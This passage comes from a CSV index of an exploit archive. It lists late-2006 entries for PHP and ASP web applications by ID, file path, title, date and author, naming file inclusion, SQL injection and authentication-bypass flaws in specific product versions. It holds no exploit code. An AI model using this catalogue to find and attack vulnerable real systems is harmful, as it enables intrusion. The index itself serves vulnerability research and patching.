Inclusion",2006-10-31,"Sumit Siddharth",webapps,php, +2693,exploits/php/webapps/2693.txt,"PwsPHP 1.1 - '/themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,webapps,php, +2694,exploits/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,webapps,php, +2696,exploits/php/webapps/2696.php,"Invision Power Board 2.1.7 - 'Debug' Remote Password Change",2006-11-01,Rapigator,webapps,php, +2697,exploits/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,webapps,php, +2698,exploits/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion",2006-11-01,Kw3[R]Ln,webapps,php, +2701,exploits/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,webapps,php, +2702,exploits/php/webapps/2702.php,"Lithium CMS 4.04c - '/classes/index.php' Local File Inclusion",2006-11-02,Kacper,webapps,php, +2703,exploits/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,webapps,php, +2704,exploits/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,webapps,php, +2706,exploits/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,webapps,php, +2707,exploits/php/webapps/2707.php,"PostNuke 0.763 - 'PNSV lang' Remote Code Execution",2006-11-03,Kacper,webapps,php, +2709,exploits/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - 'admin' Authentication Bypass",2006-11-03,SlimTim10,webapps,php, +2710,exploits/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",webapps,php, +2711,exploits/php/webapps/2711.php,"e107 < 0.75 - 'e107language_e107cookie' Local File Inclusion",2006-11-04,Kacper,webapps,php, +2712,exploits/php/webapps/2712.php,"MDPro 1.0.76 - 'Cookie PNSVlang' Local File Inclusion",2006-11-04,Kacper,webapps,php, +2713,exploits/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,webapps,php, +2714,exploits/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - 'search_user' SQL Injection",2006-11-04,x23,webapps,php, +2717,exploits/php/webapps/2717.txt,"phpDynaSite 3.2.2 - 'racine' Remote File Inclusion",2006-11-04,DeltahackingTEAM,webapps,php, +2718,exploits/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,webapps,php, +2719,exploits/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - Cookie sLanguage Local File Inclusion",2006-11-05,Kacper,webapps,php, +2720,exploits/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,webapps,php, +2721,exploits/php/webapps/2721.php,"Ultimate PHP Board 2.0 - 'header_simple.php' File Inclusion",2006-11-05,Kacper,webapps,php, +2722,exploits/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,webapps,php, +2724,exploits/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,webapps,php, +2725,exploits/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Remote File Inclusion",2006-11-06,the_day,webapps,php, +2726,exploits/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,webapps,php, +2727,exploits/php/webapps/2727.txt,"OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions",2006-11-06,the_day,webapps,php, +2728,exploits/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,webapps,php, +2731,exploits/php/webapps/2731.pl,"iPrimal Forums - '/admin/index.php' Change User Password",2006-11-06,Bl0od3r,webapps,php, +2732,exploits/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,webapps,php, +2733,exploits/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,webapps,php, +2736,exploits/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,webapps,php, +2739,exploits/php/webapps/2739.txt,"iPrimal Forums - '/admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,webapps,php, +2740,exploits/php/webapps/2740.txt,"vBlog / C12 0.1 - 'cfgProgDir' Remote File Inclusion",2006-11-08,DeltahackingTEAM,webapps,php, +2741,exploits/php/webapps/2741.txt,"IrayoBlog 0.2.4 - '/inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,webapps,php, +2742,exploits/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",webapps,php, +2744,exploits/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,webapps,php, +2745,exploits/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,webapps,php, +2746,exploits/asp/webapps/2746.pl,"AspPired2Poll 1.0 - 'MoreInfo.asp' SQL Injection",2006-11-09,ajann,webapps,asp, +2747,exploits/php/webapps/2747.txt,"MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",webapps,php, +2748,exploits/php/webapps/2748.pl,"PHPManta 1.0.2 - 'view-sourcecode.php' Local File Inclusion",2006-11-09,ajann,webapps,php, +2750,exploits/php/webapps/2750.txt,"EncapsCMS 0.3.6 - '/core/core.php' Remote File Inclusion",2006-11-10,Firewall,webapps,php, +2751,exploits/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",webapps,php, +2752,exploits/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,webapps,php, +2754,exploits/asp/webapps/2754.pl,"NuCommunity 1.0 - 'cl_CatListing.asp' SQL Injection",2006-11-11,ajann,webapps,asp, +2755,exploits/asp/webapps/2755.pl,"NuRems 1.0 - 'propertysdetails.asp' SQL Injection",2006-11-11,ajann,webapps,asp, +2756,exploits/asp/webapps/2756.txt,"NuStore 1.0 - 'Products.asp' SQL Injection",2006-11-11,ajann,webapps,asp, +2757,exploits/asp/webapps/2757.pl,"NuSchool 1.0 - 'CampusNewsDetails.asp' SQL Injection",2006-11-11,ajann,webapps,asp, +2758,exploits/php/webapps/2758.php,"PHPWCMS 1.2.6 - Cookie: wcs_user_lang Local File Inclusion",2006-11-11,Kacper,webapps,php, +2759,exploits/php/webapps/2759.php,"PHPWind 5.0.1 - 'AdminUser' Blind SQL Injection",2006-11-12,rgod,webapps,php, +2760,exploits/php/webapps/2760.php,"Rama CMS 0.68 - Cookie: lang Local File Inclusion",2006-11-12,Kacper,webapps,php, +2761,exploits/asp/webapps/2761.pl,"Munch Pro 1.0 - 'switch.asp' SQL Injection",2006-11-12,ajann,webapps,asp, +2762,exploits/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,webapps,asp, +2763,exploits/asp/webapps/2763.txt,"UStore 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,webapps,asp, +2764,exploits/asp/webapps/2764.txt,"USupport 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,webapps,asp, +2765,exploits/asp/webapps/2765.txt,"UPublisher 1.0 - 'viewarticle.asp' SQL Injection",2006-11-12,ajann,webapps,asp, +2766,exploits/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,webapps,php, +2767,exploits/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,webapps,php, +2768,exploits/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,webapps,php, +2769,exploits/php/webapps/2769.php,"Quick.Cart 2.0 - '/actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,webapps,php, +2772,exploits/asp/webapps/2772.html,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change",2006-11-13,ajann,webapps,asp, +2773,exploits/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass",2006-11-13,ajann,webapps,asp, +2774,exploits/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass",2006-11-13,ajann,webapps,asp, +2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php, +2776,exploits/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,webapps,php, +2777,exploits/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,webapps,php, +2778,exploits/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",webapps,php, +2779,exploits/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection",2006-11-14,ajann,webapps,asp, +2780,exploits/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,webapps,asp, +2781,exploits/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",webapps,asp, +2782,exploits/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Authentication Bypass",2006-11-14,"Security Access Point",webapps,asp, +2786,exploits/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,webapps,php, +2790,exploits/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,webapps,php, +2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php, +2794,exploits/php/webapps/2794.txt,"mg.applanix 1.3.1 - 'apx_root_path' Remote File Inclusion",2006-11-17,v1per-haCker,webapps,php, +2795,exploits/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",webapps,php, +2796,exploits/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,webapps,php, +2797,exploits/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,webapps,php, +2798,exploits/php/webapps/2798.txt,"Powies MatchMaker 4.05 - 'matchdetail.php' SQL Injection",2006-11-17,SHiKaA,webapps,php, +2799,exploits/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion",2006-11-17,bd0rk,webapps,php, +2807,exploits/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,webapps,php, +2808,exploits/php/webapps/2808.txt,"Dicshunary 0.1a - 'check_status.php' Remote File Inclusion",2006-11-17,DeltahackingTEAM,webapps,php, +2810,exploits/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,webapps,php, +2811,exploits/php/webapps/2811.txt,"PHPWebThings 1.5.2 - 'editor.php' Remote File Inclusion",2006-11-18,nuffsaid,webapps,php, +2812,exploits/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,webapps,php, +2813,exploits/asp/webapps/2813.txt,"ASPNuke 0.80 - 'register.asp' SQL Injection",2006-11-19,ajann,webapps,asp, +2814,exploits/php/webapps/2814.txt,"PHPQuickGallery 1.9 - 'textFile' Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",webapps,php, +2817,exploits/php/webapps/2817.txt,"Photo Cart 3.9 - 'adminprint.php' Remote File Inclusion",2006-11-21,irvian,webapps,php, +2818,exploits/php/webapps/2818.txt,"e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,webapps,php, +2819,exploits/php/webapps/2819.txt,"LDU 8.x - avatarselect id SQL Injection",2006-11-21,nukedx,webapps,php, +2820,exploits/php/webapps/2820.txt,"Seditio 1.10 - avatarselect id SQL Injection",2006-11-21,nukedx,webapps,php, +2822,exploits/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' SQL Injection",2006-11-21,Revenge,webapps,php, +2823,exploits/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",webapps,php, +2826,exploits/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusions",2006-11-21,3l3ctric-Cracker,webapps,php, +2827,exploits/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusions",2006-11-21,iss4m,webapps,php, +2828,exploits/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,webapps,asp, +2829,exploits/asp/webapps/2829.txt,"fipsGallery 1.5 - 'index1.asp' SQL Injection",2006-11-22,ajann,webapps,asp, +2830,exploits/asp/webapps/2830.txt,"fipsForum 2.6 - 'default2.asp' SQL Injection",2006-11-22,ajann,webapps,asp, +2831,exploits/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,webapps,php, +2832,exploits/php/webapps/2832.txt,"Messagerie Locale - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,webapps,php, +2833,exploits/php/webapps/2833.txt,"Site News - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,webapps,php, +2834,exploits/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection",2006-11-23,GregStar,webapps,php, +2835,exploits/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection",2006-11-23,GregStar,webapps,php, +2836,exploits/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,webapps,php, +2838,exploits/php/webapps/2838.txt,"HSRS 1.0 - 'addcode.php' Remote File Inclusion",2006-11-23,"Cold Zero",webapps,php, +2839,exploits/php/webapps/2839.txt,"OWLLib 1.0 - 'OWLMemoryProperty.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,webapps,php, +2840,exploits/php/webapps/2840.txt,"PEGames - 'index.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,webapps,php, +2841,exploits/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection",2006-11-24,rgod,webapps,php, +2842,exploits/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,webapps,php, +2843,exploits/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,webapps,php, +2844,exploits/php/webapps/2844.pl,"Cahier de texte 2.0 - Database Backup / Source Disclosure",2006-11-24,DarkFig,webapps,php, +2846,exploits/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,webapps,asp, +2847,exploits/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",webapps,php, +2848,exploits/asp/webapps/2848.txt,"Basic Forum 1.1 - 'edit.asp' SQL Injection",2006-11-25,bolivar,webapps,asp, +2849,exploits/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,webapps,asp, +2850,exploits/php/webapps/2850.txt,"Exhibit Engine 1.22 - 'styles.php' Remote File Inclusion",2006-11-25,Kacper,webapps,php, +2851,exploits/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",webapps,php, +2852,exploits/php/webapps/2852.txt,"Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,webapps,php, +2853,exploits/asp/webapps/2853.txt,"SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection",2006-11-26,bolivar,webapps,asp, +2859,exploits/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,webapps,php, +2862,exploits/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,webapps,php, +2863,exploits/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,webapps,php, +2864,exploits/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,webapps,php, +2867,exploits/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,webapps,php, +2869,exploits/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,webapps,php, +2871,exploits/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,webapps,php, +2876,exploits/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",webapps,php, +2877,exploits/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,webapps,php, +2878,exploits/php/webapps/2878.txt,"ContentServ 4.x - '/admin/FileServer.php' File Disclosure",2006-12-01,qobaiashi,webapps,php, +2881,exploits/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,webapps,asp, +2882,exploits/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,webapps,php, +2883,exploits/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,webapps,php, +2884,exploits/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,webapps,php, +2885,exploits/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,webapps,php, +2886,exploits/php/webapps/2886.txt,"PHP Upload Center 2.0 - 'activate.php' File Inclusion",2006-12-03,GregStar,webapps,php, +2888,exploits/php/webapps/2888.php,"Envolution 1.1.0 - 'PNSVlang' Remote Code Execution",2006-12-03,Kacper,webapps,php, +2889,exploits/php/webapps/2889.pl,"QuickCart 2.0 - 'categories.php' Local File Inclusion",2006-12-03,r0ut3r,webapps,php, +2890,exploits/php/webapps/2890.txt,"PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions",2006-12-03,"Cold Zero",webapps,php, +2891,exploits/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion",2006-12-04,DeltahackingTEAM,webapps,php, +2894,exploits/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,webapps,php, +2895,exploits/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - 'link' Remote File Inclusion",2006-12-07,3l3ctric-Cracker,webapps,php, +2896,exploits/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion",2006-12-08,3l3ctric-Cracker,webapps,php, +2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",webapps,php, +2898,exploits/php/webapps/2898.txt,"ThinkEdit 1.9.2 - 'render.php' Remote File Inclusion",2006-12-08,r0ut3r,webapps,php, +2899,exploits/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection",2006-12-08,koray,webapps,php, +2902,exploits/php/webapps/2902.pl,"TorrentFlux 2.2 - 'downloaddetails.php' Local File Disclosure",2006-12-09,r0ut3r,webapps,php, +2903,exploits/php/webapps/2903.pl,"TorrentFlux 2.2 - 'maketorrent.php' Remote Command Execution",2006-12-09,r0ut3r,webapps,php, +2904,exploits/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,webapps,php, +2905,exploits/php/webapps/2905.txt,"Gizzar 03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,webapps,php, +2906,exploits/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,webapps,php, +2907,exploits/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,webapps,asp, +2908,exploits/asp/webapps/2908.txt,"Request For Travel 1.0 - 'product' SQL Injection",2006-12-09,ajann,webapps,asp, +2909,exploits/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass",2006-12-09,ajann,webapps,asp, +2913,exploits/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,webapps,php, +2917,exploits/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,webapps,php, +2919,exploits/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,webapps,php, +2920,exploits/php/webapps/2920.txt,"Barman 0.0.1r3 - 'Interface.php' Remote File Inclusion",2006-12-11,DeltahackingTEAM,webapps,php, +2921,exploits/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Inclusion",2006-12-12,Lu7k,webapps,php, +2923,exploits/php/webapps/2923.txt,"Blog:CMS 4.1.3 - 'NP_UserSharing.php' Remote File Inclusion",2006-12-12,"HACKERS PAL",webapps,php, +2924,exploits/php/webapps/2924.txt,"mxBB Module kb_mods 2.0.2 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,webapps,php, +2925,exploits/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,webapps,php, +2927,exploits/php/webapps/2927.txt,"PHPMyCMS 0.3 - 'basic.inc.php' Remote File Inclusion",2006-12-13,v1per-haCker,webapps,php, +2930,exploits/php/webapps/2930.pl,"yaplap 0.6.1b - 'ldap.php' Remote File Inclusion",2006-12-14,DeltahackingTEAM,webapps,php, +2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,webapps,php, +2937,exploits/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution",2006-12-16,Kacper,webapps,php, +2938,exploits/php/webapps/2938.html,"Bandwebsite 1.5 - 'LOGIN' Remote Add Admin",2006-12-16,H0tTurk-,webapps,php, +2939,exploits/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote File Inclusion",2006-12-16,ajann,webapps,php, +2940,exploits/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,webapps,php, +2941,exploits/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote File Inclusion",2006-12-16,ajann,webapps,php, +2943,exploits/php/webapps/2943.txt,"Azucar CMS 1.3 - '/admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,webapps,php, +2944,exploits/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,webapps,php, +2945,exploits/php/webapps/2945.txt,"Uploader & Downloader 3.0 - 'id_user' SQL Injection",2006-12-18,"the master",webapps,php, +2948,exploits/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",webapps,php, +2953,exploits/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection",2006-12-19,rgod,webapps,php, +2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,webapps,php, +2956,exploits/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusions",2006-12-19,nuffsaid,webapps,php, +2957,exploits/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",webapps,php, +2958,exploits/php/webapps/2958.txt,"cwmVote 1.0 - 'archive.php' Remote File Inclusion",2006-12-19,bd0rk,webapps,php, +2960,exploits/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,webapps,php, +2962,exploits/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,webapps,asp, +2963,exploits/asp/webapps/2963.txt,"cwmExplorer 1.0 - 'show_file' Source Code Disclosure",2006-12-19,ajann,webapps,asp, +2964,exploits/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,webapps,php, +2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php, +2968,exploits/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,webapps,php, +2969,exploits/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - 'htm2PHP.php' File Disclosure",2006-12-21,"the master",webapps,php, +2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php, +2971,exploits/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusions",2006-12-21,nuffsaid,webapps,php, +2973,exploits/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,webapps,php, +2975,exploits/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,webapps,php, +2976,exploits/php/webapps/2976.txt,"inertianews 0.02b - 'inertianews_main.php' Remote File Inclusion",2006-12-21,bd0rk,webapps,php, +2977,exploits/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,webapps,php, +2979,exploits/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,webapps,php, +2980,exploits/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - '/admin/auth.php' Remote File Inclusion",2006-12-22,mdx,webapps,php, +2981,exploits/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,webapps,php, +2982,exploits/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,webapps,php, +2983,exploits/php/webapps/2983.txt,"b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion",2006-12-23,mdx,webapps,php, +2984,exploits/php/webapps/2984.txt,"SH-News 0.93 - 'misc.php' Remote File Inclusion",2006-12-23,bd0rk,webapps,php, +2986,exploits/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - 'subLevel2.asp' SQL Injection",2006-12-23,ajann,webapps,asp, +2987,exploits/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL Injection / Cross-Site Scripting) Vulnerabilities",2006-12-23,ajann,webapps,asp, +2988,exploits/asp/webapps/2988.pl,"Enthrallweb eJobs - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,webapps,asp, +2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp, +2990,exploits/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,webapps,asp, +2991,exploits/asp/webapps/2991.pl,"Enthrallweb ePages - 'actualpic.asp' SQL Injection",2006-12-23,ajann,webapps,asp, +2992,exploits/asp/webapps/2992.txt,"Dragon Business Directory 3.01.12 - 'ID' SQL Injection",2006-12-23,ajann,webapps,asp, +2993,exploits/asp/webapps/2993.txt,"Calendar MX BASIC 1.0.2 - 'ID' SQL Injection",2006-12-23,ajann,webapps,asp, +2994,exploits/asp/webapps/2994.html,"Enthrallweb eClassifieds 1.0 - Remote User Pass Change",2006-12-23,ajann,webapps,asp, +2995,exploits/asp/webapps/2995.html,"Enthrallweb eCoupons 1.0 - 'myprofile.asp' Remote Pass Change",2006-12-23,ajann,webapps,asp, +2996,exploits/asp/webapps/2996.html,"Enthrallweb eNews 1.0 - Remote User Pass Change",2006-12-23,ajann,webapps,asp, +2997,exploits/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - 'detail.asp' SQL Injection",2006-12-24,ajann,webapps,asp, +2998,exploits/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,webapps,asp, +2999,exploits/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - '/chat/login.php' Code Execution",2006-12-24,nuffsaid,webapps,php, +3000,exploits/php/webapps/3000.pl,"Pagetool CMS 1.07 